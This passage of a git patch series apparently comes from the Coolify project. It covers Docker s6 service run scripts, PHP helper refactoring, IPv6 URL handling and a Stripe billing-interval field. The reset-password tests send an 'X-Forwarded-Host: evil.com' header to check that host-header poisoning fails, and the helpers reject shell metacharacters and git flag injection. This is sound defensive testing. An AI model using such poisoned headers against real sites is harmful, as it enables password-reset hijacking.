+if grep -qE '^NIGHTWATCH_ENABLED=true' .env 2>/dev/null; then
+    echo "nightwatch-agent: enabled, starting..."
+    exec php artisan nightwatch:agent
+fi
 
+echo "nightwatch-agent: disabled, sleeping."
+exec sleep infinity
diff --git a/docker/development/etc/s6-overlay/s6-rc.d/scheduler-worker/run b/docker/development/etc/s6-overlay/s6-rc.d/scheduler-worker/run
index b81a44833..6c4d2be9f 100644
--- a/docker/development/etc/s6-overlay/s6-rc.d/scheduler-worker/run
+++ b/docker/development/etc/s6-overlay/s6-rc.d/scheduler-worker/run
@@ -1,13 +1,11 @@
-#!/command/execlineb -P
+#!/bin/sh
 
-# Use with-contenv to ensure environment variables are available
-with-contenv
 cd /var/www/html
 
-foreground {
-    php
-    artisan
-    start:scheduler
-}
-
+if grep -qE '^SCHEDULER_ENABLED=false' .env 2>/dev/null; then
+    echo "scheduler-worker: disabled, sleeping."
+    exec sleep infinity
+fi
 
+echo "scheduler-worker: enabled, starting..."
+exec php artisan schedule:work
diff --git a/docker/production/etc/s6-overlay/s6-rc.d/horizon/run b/docker/production/etc/s6-overlay/s6-rc.d/horizon/run
index be6647607..e6a17f858 100644
--- a/docker/production/etc/s6-overlay/s6-rc.d/horizon/run
+++ b/docker/production/etc/s6-overlay/s6-rc.d/horizon/run
@@ -1,11 +1,11 @@
-#!/command/execlineb -P
+#!/bin/sh
 
-# Use with-contenv to ensure environment variables are available
-with-contenv
 cd /var/www/html
-foreground {
-    php
-    artisan
-    start:horizon
-}
 
+if grep -qE '^HORIZON_ENABLED=false' .env 2>/dev/null; then
+    echo "horizon: disabled, sleeping."
+    exec sleep infinity
+fi
+
+echo "horizon: enabled, starting..."
+exec php artisan horizon
diff --git a/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/run b/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
index 80d73eadb..80b421c92 100644
--- a/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
+++ b/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
@@ -1,11 +1,11 @@
-#!/command/execlineb -P
+#!/bin/sh
 
-# Use with-contenv to ensure environment variables are available
-with-contenv
 cd /var/www/html
-foreground {
-    php
-    artisan
-    start:nightwatch
-}
 
+if grep -qE '^NIGHTWATCH_ENABLED=true' .env 2>/dev/null; then
+    echo "nightwatch-agent: enabled, starting..."
+    exec php artisan nightwatch:agent
+fi
+
+echo "nightwatch-agent: disabled, sleeping."
+exec sleep infinity
diff --git a/docker/production/etc/s6-overlay/s6-rc.d/scheduler-worker/run b/docker/production/etc/s6-overlay/s6-rc.d/scheduler-worker/run
index a2ecb0a73..6c4d2be9f 100644
--- a/docker/production/etc/s6-overlay/s6-rc.d/scheduler-worker/run
+++ b/docker/production/etc/s6-overlay/s6-rc.d/scheduler-worker/run
@@ -1,10 +1,11 @@
-#!/command/execlineb -P
+#!/bin/sh
 
-# Use with-contenv to ensure environment variables are available
-with-contenv
 cd /var/www/html
-foreground {
-    php
-    artisan
-    start:scheduler
-}
+
+if grep -qE '^SCHEDULER_ENABLED=false' .env 2>/dev/null; then
+    echo "scheduler-worker: disabled, sleeping."
+    exec sleep infinity
+fi
+
+echo "scheduler-worker: enabled, starting..."
+exec php artisan schedule:work

From af3826eac0e0fa0ac846302e888997ac725f865e Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 27 Mar 2026 14:14:01 +0100
Subject: [PATCH 155/213] feat(reset-password): add IPv6 support and header
 poisoning protection

- Add support for bracketed IPv6 addresses when FQDN is not configured
- Harden password reset URL generation against X-Forwarded-Host header poisoning
- Add test coverage for IPv6-only configurations with malicious headers
- Update imports and clean up exception syntax in shared helpers
---
 bootstrap/helpers/shared.php           | 107 +++++++++++++------------
 tests/Feature/ResetPasswordUrlTest.php |  40 +++++++++
 2 files changed, 97 insertions(+), 50 deletions(-)

diff --git a/bootstrap/helpers/shared.php b/bootstrap/helpers/shared.php
index 84472a07e..920d458b3 100644
--- a/bootstrap/helpers/shared.php
+++ b/bootstrap/helpers/shared.php
@@ -16,6 +16,7 @@
 use App\Models\Service;
 use App\Models\ServiceApplication;
 use App\Models\ServiceDatabase;
+use App\Models\SharedEnvironmentVariable;
 use App\Models\StandaloneClickhouse;
 use App\Models\StandaloneDragonfly;
 use App\Models\StandaloneKeydb;
@@ -28,8 +29,10 @@
 use App\Models\User;
 use Carbon\CarbonImmutable;
 use DanHarrin\LivewireRateLimiting\Exceptions\TooManyRequestsException;
+use Illuminate\Database\Eloquent\ModelNotFoundException;
 use Illuminate\Database\UniqueConstraintViolationException;
 use Illuminate\Process\Pool;
+use Illuminate\Support\Carbon;
 use Illuminate\Support\Collection;
 use Illuminate\Support\Facades\Auth;
 use Illuminate\Support\Facades\Cache;
@@ -49,10 +52,14 @@
 use Lcobucci\JWT\Signer\Hmac\Sha256;
 use Lcobucci\JWT\Signer\Key\InMemory;
 use Lcobucci\JWT\Token\Builder;
+use Livewire\Component;
+use Nubs\RandomNameGenerator\All;
+use Nubs\RandomNameGenerator\Alliteration;
 use phpseclib3\Crypt\EC;
 use phpseclib3\Crypt\RSA;
 use Poliander\Cron\CronExpression;
 use PurplePixie\PhpDns\DNSQuery;
+use PurplePixie\PhpDns\DNSTypes;
 use Spatie\Url\Url;
 use Symfony\Component\Yaml\Yaml;
 use Visus\Cuid2\Cuid2;
@@ -116,7 +123,7 @@ function sanitize_string(?string $input = null): ?string
  * @param  string  $context  Descriptive name for error messages (e.g., 'volume source', 'service name')
  * @return string The validated input (unchanged if valid)
  *
- * @throws \Exception If dangerous characters are detected
+ * @throws Exception If dangerous characters are detected
  */
 function validateShellSafePath(string $input, string $context = 'path'): string
 {
@@ -138,7 +145,7 @@ function validateShellSafePath(string $input, string $context = 'path'): string
     // Check for dangerous characters
     foreach ($dangerousChars as $char => $description) {
         if (str_contains($input, $char)) {
-            throw new \Exception(
+            throw new Exception(
                 "Invalid {$context}: contains forbidden character '{$char}' ({$description}). ".
                 'Shell metacharacters are not allowed for security reasons.'
             );
@@ -160,7 +167,7 @@ function validateShellSafePath(string $input, string $context = 'path'): string
  * @param  string  $input  The databases_to_backup string
  * @return string The validated input
  *
- * @throws \Exception If any component contains dangerous characters
+ * @throws Exception If any component contains dangerous characters
  */
 function validateDatabasesBackupInput(string $input): string
 {
@@ -211,7 +218,7 @@ function validateDatabasesBackupInput(string $input): string
  * @param  string  $context  Descriptive name for error messages
  * @return string The validated input (trimmed)
  *
- * @throws \Exception If the input contains disallowed characters
+ * @throws Exception If the input contains disallowed characters
  */
 function validateGitRef(string $input, string $context = 'git ref'): string
 {
@@ -223,12 +230,12 @@ function validateGitRef(string $input, string $context = 'git ref'): string
 
     // Must not start with a hyphen (git flag injection)
     if (str_starts_with($input, '-')) {
-        throw new \Exception("Invalid {$context}: must not start with a hyphen.");
+        throw new Exception("Invalid {$context}: must not start with a hyphen.");
     }
 
     // Allow only alphanumeric characters, dots, hyphens, underscores, and slashes
     if (! preg_match('/^[a-zA-Z0-9][a-zA-Z0-9._\-\/]*$/', $input)) {
-        throw new \Exception("Invalid {$context}: contains disallowed characters. Only alphanumeric characters, dots, hyphens, underscores, and slashes are allowed.");
+        throw new Exception("Invalid {$context}: contains disallowed characters. Only alphanumeric characters, dots, hyphens, underscores, and slashes are allowed.");
     }
 
     return $input;
@@ -282,7 +289,7 @@ function refreshSession(?Team $team = null): void
     });
     session(['currentTeam' => $team]);
 }
-function handleError(?Throwable $error = null, ?Livewire\Component $livewire = null, ?string $customErrorMessage = null)
+function handleError(?Throwable $error = null, ?Component $livewire = null, ?string $customErrorMessage = null)
 {
     if ($error instanceof TooManyRequestsException) {
         if (isset($livewire)) {
@@ -299,7 +306,7 @@ function handleError(?Throwable $error = null, ?Livewire\Component $livewire = n
         return 'Duplicate entry found. Please use a different name.';
     }
 
-    if ($error instanceof \Illuminate\Database\Eloquent\ModelNotFoundException) {
+    if ($error instanceof ModelNotFoundException) {
         abort(404);
     }
 
@@ -329,7 +336,7 @@ function get_latest_sentinel_version(): string
         $versions = $response->json();
 
         return data_get($versions, 'coolify.sentinel.version');
-    } catch (\Throwable) {
+    } catch (Throwable) {
         return '0.0.0';
     }
 }
@@ -339,7 +346,7 @@ function get_latest_version_of_coolify(): string
         $versions = get_versions_data();
 
         return data_get($versions, 'coolify.v4.version', '0.0.0');
-    } catch (\Throwable $e) {
+    } catch (Throwable $e) {
 
         return '0.0.0';
     }
@@ -347,9 +354,9 @@ function get_latest_version_of_coolify(): string
 
 function generate_random_name(?string $cuid = null): string
 {
-    $generator = new \Nubs\RandomNameGenerator\All(
+    $generator = new All(
         [
-            new \Nubs\RandomNameGenerator\Alliteration,
+            new Alliteration,
         ]
     );
     if (is_null($cuid)) {
@@ -448,7 +455,7 @@ function getFqdnWithoutPort(string $fqdn)
         $path = $url->getPath();
 
         return "$scheme://$host$path";
-    } catch (\Throwable) {
+    } catch (Throwable) {
         return $fqdn;
     }
 }
@@ -478,10 +485,10 @@ function base_url(bool $withPort = true): string
     }
     if ($settings->public_ipv6) {
         if ($withPort) {
-            return "http://$settings->public_ipv6:$port";
+            return "http://[$settings->public_ipv6]:$port";
         }
 
-        return "http://$settings->public_ipv6";
+        return "http://[$settings->public_ipv6]";
     }
 
     return url('/');
@@ -537,21 +544,21 @@ function validate_cron_expression($expression_to_validate): bool
  * Even if the job runs minutes late, it still catches the missed cron window.
  * Without a dedupKey, falls back to a simple isDue() check.
  */
-function shouldRunCronNow(string $frequency, string $timezone, ?string $dedupKey = null, ?\Illuminate\Support\Carbon $executionTime = null): bool
+function shouldRunCronNow(string $frequency, string $timezone, ?string $dedupKey = null, ?Carbon $executionTime = null): bool
 {
-    $cron = new \Cron\CronExpression($frequency);
-    $executionTime = ($executionTime ?? \Illuminate\Support\Carbon::now())->copy()->setTimezone($timezone);
+    $cron = new Cron\CronExpression($frequency);
+    $executionTime = ($executionTime ?? Carbon::now())->copy()->setTimezone($timezone);
 
     if ($dedupKey === null) {
         return $cron->isDue($executionTime);
     }
 
-    $previousDue = \Illuminate\Support\Carbon::instance($cron->getPreviousRunDate($executionTime, allowCurrentDate: true));
+    $previousDue = Carbon::instance($cron->getPreviousRunDate($executionTime, allowCurrentDate: true));
     $lastDispatched = Cache::get($dedupKey);
 
     $shouldFire = $lastDispatched === null
         ? $cron->isDue($executionTime)
-        : $previousDue->gt(\Illuminate\Support\Carbon::parse($lastDispatched));
+        : $previousDue->gt(Carbon::parse($lastDispatched));
 
     // Always write: seeds on first miss, refreshes on dispatch.
     // 30-day static TTL covers all intervals; orphan keys self-clean.
@@ -932,7 +939,7 @@ function get_service_templates(bool $force = false): Collection
             $services = $response->json();
 
             return collect($services);
-        } catch (\Throwable) {
+        } catch (Throwable) {
             $services = File::get(base_path('templates/'.config('constants.services.file_name')));
 
             return collect(json_decode($services))->sortKeys();
@@ -955,7 +962,7 @@ function getResourceByUuid(string $uuid, ?int $teamId = null)
     }
 
     // ServiceDatabase has a different relationship path: service->environment->project->team_id
-    if ($resource instanceof \App\Models\ServiceDatabase) {
+    if ($resource instanceof ServiceDatabase) {
         if ($resource->service?->environment?->project?->team_id === $teamId) {
             return $resource;
         }
@@ -1081,7 +1088,7 @@ function generateGitManualWebhook($resource, $type)
     if ($resource->source_id !== 0 && ! is_null($resource->source_id)) {
         return null;
     }
-    if ($resource->getMorphClass() === \App\Models\Application::class) {
+    if ($resource->getMorphClass() === Application::class) {
         $baseUrl = base_url();
 
         return Url::fromString($baseUrl)."/webhooks/source/$type/events/manual";
@@ -1102,11 +1109,11 @@ function sanitizeLogsForExport(string $text): string
 
 function getTopLevelNetworks(Service|Application $resource)
 {
-    if ($resource->getMorphClass() === \App\Models\Service::class) {
+    if ($resource->getMorphClass() === Service::class) {
         if ($resource->docker_compose_raw) {
             try {
                 $yaml = Yaml::parse($resource->docker_compose_raw);
-            } catch (\Exception $e) {
+            } catch (Exception $e) {
                 // If the docker-compose.yml file is not valid, we will return the network name as the key
                 $topLevelNetworks = collect([
                     $resource->uuid => [
@@ -1169,10 +1176,10 @@ function getTopLevelNetworks(Service|Application $resource)
 
             return $topLevelNetworks->keys();
         }
-    } elseif ($resource->getMorphClass() === \App\Models\Application::class) {
+    } elseif ($resource->getMorphClass() === Application::class) {
         try {
             $yaml = Yaml::parse($resource->docker_compose_raw);
-        } catch (\Exception $e) {
+        } catch (Exception $e) {
             // If the docker-compose.yml file is not valid, we will return the network name as the key
             $topLevelNetworks = collect([
                 $resource->uuid => [
@@ -1479,7 +1486,7 @@ function validateDNSEntry(string $fqdn, Server $server)
         $ip = $server->ip;
     }
     $found_matching_ip = false;
-    $type = \PurplePixie\PhpDns\DNSTypes::NAME_A;
+    $type = DNSTypes::NAME_A;
     foreach ($dns_servers as $dns_server) {
         try {
             $query = new DNSQuery($dns_server);
@@ -1500,7 +1507,7 @@ function validateDNSEntry(string $fqdn, Server $server)
                     }
                 }
             }
-        } catch (\Exception) {
+        } catch (Exception) {
         }
     }
 
@@ -1682,7 +1689,7 @@ function get_public_ips()
             }
             InstanceSettings::get()->update(['public_ipv4' => $ipv4]);
         }
-    } catch (\Exception $e) {
+    } catch (Exception $e) {
         echo "Error: {$e->getMessage()}\n";
     }
     try {
@@ -1697,7 +1704,7 @@ function get_public_ips()
             }
             InstanceSettings::get()->update(['public_ipv6' => $ipv6]);
         }
-    } catch (\Throwable $e) {
+    } catch (Throwable $e) {
         echo "Error: {$e->getMessage()}\n";
     }
 }
@@ -1795,15 +1802,15 @@ function customApiValidator(Collection|array $item, array $rules)
 }
 function parseDockerComposeFile(Service|Application $resource, bool $isNew = false, int $pull_request_id = 0, ?int $preview_id = null)
 {
-    if ($resource->getMorphClass() === \App\Models\Service::class) {
+    if ($resource->getMorphClass() === Service::class) {
         if ($resource->docker_compose_raw) {
             // Extract inline comments from raw YAML before Symfony parser discards them
             $envComments = extractYamlEnvironmentComments($resource->docker_compose_raw);
 
             try {
                 $yaml = Yaml::parse($resource->docker_compose_raw);
-            } catch (\Exception $e) {
-                throw new \RuntimeException($e->getMessage());
+            } catch (Exception $e) {
+                throw new RuntimeException($e->getMessage());
             }
             $allServices = get_service_templates();
             $topLevelVolumes = collect(data_get($yaml, 'volumes', []));
@@ -2567,10 +2574,10 @@ function parseDockerComposeFile(Service|Application $resource, bool $isNew = fal
         } else {
             return collect([]);
         }
-    } elseif ($resource->getMorphClass() === \App\Models\Application::class) {
+    } elseif ($resource->getMorphClass() === Application::class) {
         try {
             $yaml = Yaml::parse($resource->docker_compose_raw);
-        } catch (\Exception) {
+        } catch (Exception) {
             return;
         }
         $server = $resource->destination->server;
@@ -3332,7 +3339,7 @@ function isAssociativeArray($array)
     }
 
     if (! is_array($array)) {
-        throw new \InvalidArgumentException('Input must be an array or a Collection.');
+        throw new InvalidArgumentException('Input must be an array or a Collection.');
     }
 
     if ($array === []) {
@@ -3448,7 +3455,7 @@ function wireNavigate(): string
 
         // Return wire:navigate.hover for SPA navigation with prefetching, or empty string if disabled
         return ($settings->is_wire_navigate_enabled ?? true) ? 'wire:navigate.hover' : '';
-    } catch (\Exception $e) {
+    } catch (Exception $e) {
         return 'wire:navigate.hover';
     }
 }
@@ -3457,13 +3464,13 @@ function wireNavigate(): string
  * Redirect to a named route with SPA navigation support.
  * Automatically uses wire:navigate when is_wire_navigate_enabled is true.
  */
-function redirectRoute(Livewire\Component $component, string $name, array $parameters = []): mixed
+function redirectRoute(Component $component, string $name, array $parameters = []): mixed
 {
     $navigate = true;
 
     try {
         $navigate = instanceSettings()->is_wire_navigate_enabled ?? true;
-    } catch (\Exception $e) {
+    } catch (Exception $e) {
         $navigate = true;
     }
 
@@ -3505,7 +3512,7 @@ function loadConfigFromGit(string $repository, string $branch, string $base_dire
     ]);
     try {
         return instant_remote_process($commands, $server);
-    } catch (\Exception) {
+    } catch (Exception) {
         // continue
     }
 }
@@ -3636,8 +3643,8 @@ function convertGitUrl(string $gitRepository, string $deploymentType, GithubApp|
         // If this happens, the user may have provided an HTTP URL when they needed an SSH one
         // Let's try and fix that for known Git providers
         switch ($source->getMorphClass()) {
-            case \App\Models\GithubApp::class:
-            case \App\Models\GitlabApp::class:
+            case GithubApp::class:
+            case GitlabApp::class:
                 $providerInfo['host'] = Url::fromString($source->html_url)->getHost();
                 $providerInfo['port'] = $source->custom_port;
                 $providerInfo['user'] = $source->custom_user;
@@ -3915,10 +3922,10 @@ function shouldSkipPasswordConfirmation(): bool
  * - User has no password (OAuth users)
  *
  * @param  mixed  $password  The password to verify (may be array if skipped by frontend)
- * @param  \Livewire\Component|null  $component  Optional Livewire component to add errors to
+ * @param  Component|null  $component  Optional Livewire component to add errors to
  * @return bool True if verification passed (or skipped), false if password is incorrect
  */
-function verifyPasswordConfirmation(mixed $password, ?Livewire\Component $component = null): bool
+function verifyPasswordConfirmation(mixed $password, ?Component $component = null): bool
 {
     // Skip if password confirmation should be skipped
     if (shouldSkipPasswordConfirmation()) {
@@ -3941,17 +3948,17 @@ function verifyPasswordConfirmation(mixed $password, ?Livewire\Component $compon
  * Extract hard-coded environment variables from docker-compose YAML.
  *
  * @param  string  $dockerComposeRaw  Raw YAML content
- * @return \Illuminate\Support\Collection Collection of arrays with: key, value, comment, service_name
+ * @return Collection Collection of arrays with: key, value, comment, service_name
  */
-function extractHardcodedEnvironmentVariables(string $dockerComposeRaw): \Illuminate\Support\Collection
+function extractHardcodedEnvironmentVariables(string $dockerComposeRaw): Collection
 {
     if (blank($dockerComposeRaw)) {
         return collect([]);
     }
 
     try {
-        $yaml = \Symfony\Component\Yaml\Yaml::parse($dockerComposeRaw);
-    } catch (\Exception $e) {
+        $yaml = Yaml::parse($dockerComposeRaw);
+    } catch (Exception $e) {
         // Malformed YAML - return empty collection
         return collect([]);
     }
@@ -4100,7 +4107,7 @@ function resolveSharedEnvironmentVariables(?string $value, $resource): ?string
         if (is_null($id)) {
             continue;
         }
-        $found = \App\Models\SharedEnvironmentVariable::where('type', $type)
+        $found = SharedEnvironmentVariable::where('type', $type)
             ->where('key', $variable)
             ->where('team_id', $resource->team()->id)
             ->where("{$type}_id", $id)
diff --git a/tests/Feature/ResetPasswordUrlTest.php b/tests/Feature/ResetPasswordUrlTest.php
index 03d1103f0..65efbb5a1 100644
--- a/tests/Feature/ResetPasswordUrlTest.php
+++ b/tests/Feature/ResetPasswordUrlTest.php
@@ -103,6 +103,46 @@ function callResetUrl(ResetPassword $notification, $notifiable): string
         ->not->toContain('evil.com');
 });
 
+it('generates reset URL with bracketed IPv6 when no FQDN is configured', function () {
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => null, 'public_ipv4' => null, 'public_ipv6' => '2001:db8::1']
+    );
+    Once::flush();
+
+    $user = User::factory()->create();
+    $notification = new ResetPassword('ipv6-token', isTransactionalEmail: false);
+
+    $url = callResetUrl($notification, $user);
+
+    expect($url)
+        ->toContain('[2001:db8::1]')
+        ->toContain('ipv6-token')
+        ->toContain(urlencode($user->email));
+});
+
+it('is immune to X-Forwarded-Host header poisoning when using IPv6 only', function () {
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => null, 'public_ipv4' => null, 'public_ipv6' => '2001:db8::1']
+    );
+    Once::flush();
+
+    $user = User::factory()->create();
+
+    $this->withHeaders([
+        'X-Forwarded-Host' => 'evil.com',
+    ])->get('/');
+
+    $notification = new ResetPassword('poisoned-token', isTransactionalEmail: false);
+    $url = callResetUrl($notification, $user);
+
+    expect($url)
+        ->toContain('[2001:db8::1]')
+        ->toContain('poisoned-token')
+        ->not->toContain('evil.com');
+});
+
 it('generates a valid route path in the reset URL', function () {
     InstanceSettings::updateOrCreate(
         ['id' => 0],

From 638f1d37f1f9e3a53fbb8e7f5eaa5314ba34419d Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 27 Mar 2026 19:05:13 +0100
Subject: [PATCH 156/213] feat(subscription): add billing interval to price
 preview

Extract and return the billing interval (month/year) from subscription pricing
data in fetchPricePreview. Update the view to dynamically display the correct
billing period based on the preview response instead of using static PHP logic.
---
 .../Stripe/UpdateSubscriptionQuantity.php     |  5 +-
 .../livewire/subscription/actions.blade.php   |  2 +-
 .../UpdateSubscriptionQuantityTest.php        | 49 +++++++++++++++++--
 3 files changed, 50 insertions(+), 6 deletions(-)

diff --git a/app/Actions/Stripe/UpdateSubscriptionQuantity.php b/app/Actions/Stripe/UpdateSubscriptionQuantity.php
index a3eab4dca..d4d29af20 100644
--- a/app/Actions/Stripe/UpdateSubscriptionQuantity.php
+++ b/app/Actions/Stripe/UpdateSubscriptionQuantity.php
@@ -4,6 +4,7 @@
 
 use App\Jobs\ServerLimitCheckJob;
 use App\Models\Team;
+use Stripe\Exception\InvalidRequestException;
 use Stripe\StripeClient;
 
 class UpdateSubscriptionQuantity
@@ -42,6 +43,7 @@ public function fetchPricePreview(Team $team, int $quantity): array
             }
 
             $currency = strtoupper($item->price->currency ?? 'usd');
+            $billingInterval = $item->price->recurring->interval ?? 'month';
 
             // Upcoming invoice gives us the prorated amount due now
             $upcomingInvoice = $this->stripe->invoices->upcoming([
@@ -99,6 +101,7 @@ public function fetchPricePreview(Team $team, int $quantity): array
                     'tax_description' => $taxDescription,
                     'quantity' => $quantity,
                     'currency' => $currency,
+                    'billing_interval' => $billingInterval,
                 ],
             ];
         } catch (\Exception $e) {
@@ -184,7 +187,7 @@ public function execute(Team $team, int $quantity): array
             \Log::info("Subscription {$subscription->stripe_subscription_id} quantity updated to {$quantity} for team {$team->name}");
 
             return ['success' => true, 'error' => null];
-        } catch (\Stripe\Exception\InvalidRequestException $e) {
+        } catch (InvalidRequestException $e) {
             \Log::error("Stripe update quantity error for team {$team->id}: ".$e->getMessage());
 
             return ['success' => false, 'error' => 'Stripe error: '.$e->getMessage()];
diff --git a/resources/views/livewire/subscription/actions.blade.php b/resources/views/livewire/subscription/actions.blade.php
index 6fba0ed83..aa129043b 100644
--- a/resources/views/livewire/subscription/actions.blade.php
+++ b/resources/views/livewire/subscription/actions.blade.php
@@ -160,7 +160,7 @@ class="w-20 px-2 py-1 text-xl font-bold text-center rounded border dark:bg-coolg
                                             <span class="dark:text-white" x-text="fmt(preview?.recurring_tax)"></span>
                                         </div>
                                         <div class="flex justify-between gap-6 text-sm font-bold pt-1.5 border-t dark:border-coolgray-400 border-neutral-200">
-                                            <span class="dark:text-white">Total / {{ $billingInterval === 'yearly' ? 'year' : 'month' }}</span>
+                                            <span class="dark:text-white">Total / <span x-text="preview?.billing_interval === 'year' ? 'year' : 'month'">month</span></span>
                                             <span class="dark:text-white" x-text="fmt(preview?.recurring_total)"></span>
                                         </div>
                                     </div>
diff --git a/tests/Feature/Subscription/UpdateSubscriptionQuantityTest.php b/tests/Feature/Subscription/UpdateSubscriptionQuantityTest.php
index 3e13170f0..3eda322e8 100644
--- a/tests/Feature/Subscription/UpdateSubscriptionQuantityTest.php
+++ b/tests/Feature/Subscription/UpdateSubscriptionQuantityTest.php
@@ -7,6 +7,7 @@
 use App\Models\User;
 use Illuminate\Foundation\Testing\RefreshDatabase;
 use Illuminate\Support\Facades\Queue;
+use Stripe\Exception\InvalidRequestException;
 use Stripe\Service\InvoiceService;
 use Stripe\Service\SubscriptionService;
 use Stripe\Service\TaxRateService;
@@ -46,7 +47,7 @@
             'data' => [(object) [
                 'id' => 'si_item_123',
                 'quantity' => 2,
-                'price' => (object) ['unit_amount' => 500, 'currency' => 'usd'],
+                'price' => (object) ['unit_amount' => 500, 'currency' => 'usd', 'recurring' => (object) ['interval' => 'month']],
             ]],
         ],
     ];
@@ -187,7 +188,7 @@
     test('handles stripe API error gracefully', function () {
         $this->mockSubscriptions
             ->shouldReceive('retrieve')
-            ->andThrow(new \Stripe\Exception\InvalidRequestException('Subscription not found'));
+            ->andThrow(new InvalidRequestException('Subscription not found'));
 
         $action = new UpdateSubscriptionQuantity($this->mockStripe);
         $result = $action->execute($this->team, 5);
@@ -199,7 +200,7 @@
     test('handles generic exception gracefully', function () {
         $this->mockSubscriptions
             ->shouldReceive('retrieve')
-            ->andThrow(new \RuntimeException('Network error'));
+            ->andThrow(new RuntimeException('Network error'));
 
         $action = new UpdateSubscriptionQuantity($this->mockStripe);
         $result = $action->execute($this->team, 5);
@@ -270,6 +271,46 @@
         expect($result['preview']['tax_description'])->toContain('27%');
         expect($result['preview']['quantity'])->toBe(3);
         expect($result['preview']['currency'])->toBe('USD');
+        expect($result['preview']['billing_interval'])->toBe('month');
+    });
+
+    test('returns yearly billing interval for annual subscriptions', function () {
+        $yearlySubscriptionResponse = (object) [
+            'items' => (object) [
+                'data' => [(object) [
+                    'id' => 'si_item_123',
+                    'quantity' => 2,
+                    'price' => (object) ['unit_amount' => 500, 'currency' => 'usd', 'recurring' => (object) ['interval' => 'year']],
+                ]],
+            ],
+        ];
+
+        $this->mockSubscriptions
+            ->shouldReceive('retrieve')
+            ->with('sub_test_qty')
+            ->andReturn($yearlySubscriptionResponse);
+
+        $this->mockInvoices
+            ->shouldReceive('upcoming')
+            ->andReturn((object) [
+                'amount_due' => 1000,
+                'total' => 1000,
+                'subtotal' => 1000,
+                'tax' => 0,
+                'currency' => 'usd',
+                'lines' => (object) [
+                    'data' => [
+                        (object) ['amount' => 1000, 'proration' => false],
+                    ],
+                ],
+                'total_tax_amounts' => [],
+            ]);
+
+        $action = new UpdateSubscriptionQuantity($this->mockStripe);
+        $result = $action->fetchPricePreview($this->team, 2);
+
+        expect($result['success'])->toBeTrue();
+        expect($result['preview']['billing_interval'])->toBe('year');
     });
 
     test('returns preview without tax when no tax applies', function () {
@@ -336,7 +377,7 @@
     test('handles Stripe API error gracefully', function () {
         $this->mockSubscriptions
             ->shouldReceive('retrieve')
-            ->andThrow(new \RuntimeException('API error'));
+            ->andThrow(new RuntimeException('API error'));
 
         $action = new UpdateSubscriptionQuantity($this->mockStripe);
         $result = $action->fetchPricePreview($this->team, 5);

From c28fbab36a1d090fcb0b90fb64757198a2fa0f84 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 27 Mar 2026 19:05:36 +0100
Subject: [PATCH 157/213] style(docker): standardize service startup log
 message format

Align log messages across all service startup scripts (horizon, nightwatch-agent,
scheduler-worker) in both development and production environments to use a
consistent "   INFO  " prefix format.
---
 docker/development/etc/s6-overlay/s6-rc.d/horizon/run         | 4 ++--
 .../development/etc/s6-overlay/s6-rc.d/nightwatch-agent/run   | 4 ++--
 .../development/etc/s6-overlay/s6-rc.d/scheduler-worker/run   | 4 ++--
 docker/production/etc/s6-overlay/s6-rc.d/horizon/run          | 4 ++--
 docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/run | 4 ++--
 docker/production/etc/s6-overlay/s6-rc.d/scheduler-worker/run | 4 ++--
 6 files changed, 12 insertions(+), 12 deletions(-)

diff --git a/docker/development/etc/s6-overlay/s6-rc.d/horizon/run b/docker/development/etc/s6-overlay/s6-rc.d/horizon/run
index e6a17f858..dbc472d06 100644
--- a/docker/development/etc/s6-overlay/s6-rc.d/horizon/run
+++ b/docker/development/etc/s6-overlay/s6-rc.d/horizon/run
@@ -3,9 +3,9 @@
 cd /var/www/html
 
 if grep -qE '^HORIZON_ENABLED=false' .env 2>/dev/null; then
-    echo "horizon: disabled, sleeping."
+    echo "   INFO  Horizon is disabled, sleeping."
     exec sleep infinity
 fi
 
-echo "horizon: enabled, starting..."
+echo "   INFO  Horizon is enabled, starting..."
 exec php artisan horizon
diff --git a/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/run b/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
index 80b421c92..ee46dba7e 100644
--- a/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
+++ b/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
@@ -3,9 +3,9 @@
 cd /var/www/html
 
 if grep -qE '^NIGHTWATCH_ENABLED=true' .env 2>/dev/null; then
-    echo "nightwatch-agent: enabled, starting..."
+    echo "   INFO  Nightwatch is enabled, starting..."
     exec php artisan nightwatch:agent
 fi
 
-echo "nightwatch-agent: disabled, sleeping."
+echo "   INFO  Nightwatch is disabled, sleeping."
 exec sleep infinity
diff --git a/docker/development/etc/s6-overlay/s6-rc.d/scheduler-worker/run b/docker/development/etc/s6-overlay/s6-rc.d/scheduler-worker/run
index 6c4d2be9f..bfa44c7e3 100644
--- a/docker/development/etc/s6-overlay/s6-rc.d/scheduler-worker/run
+++ b/docker/development/etc/s6-overlay/s6-rc.d/scheduler-worker/run
@@ -3,9 +3,9 @@
 cd /var/www/html
 
 if grep -qE '^SCHEDULER_ENABLED=false' .env 2>/dev/null; then
-    echo "scheduler-worker: disabled, sleeping."
+    echo "   INFO  Scheduler is disabled, sleeping."
     exec sleep infinity
 fi
 
-echo "scheduler-worker: enabled, starting..."
+echo "   INFO  Scheduler is enabled, starting..."
 exec php artisan schedule:work
diff --git a/docker/production/etc/s6-overlay/s6-rc.d/horizon/run b/docker/production/etc/s6-overlay/s6-rc.d/horizon/run
index e6a17f858..dbc472d06 100644
--- a/docker/production/etc/s6-overlay/s6-rc.d/horizon/run
+++ b/docker/production/etc/s6-overlay/s6-rc.d/horizon/run
@@ -3,9 +3,9 @@
 cd /var/www/html
 
 if grep -qE '^HORIZON_ENABLED=false' .env 2>/dev/null; then
-    echo "horizon: disabled, sleeping."
+    echo "   INFO  Horizon is disabled, sleeping."
     exec sleep infinity
 fi
 
-echo "horizon: enabled, starting..."
+echo "   INFO  Horizon is enabled, starting..."
 exec php artisan horizon
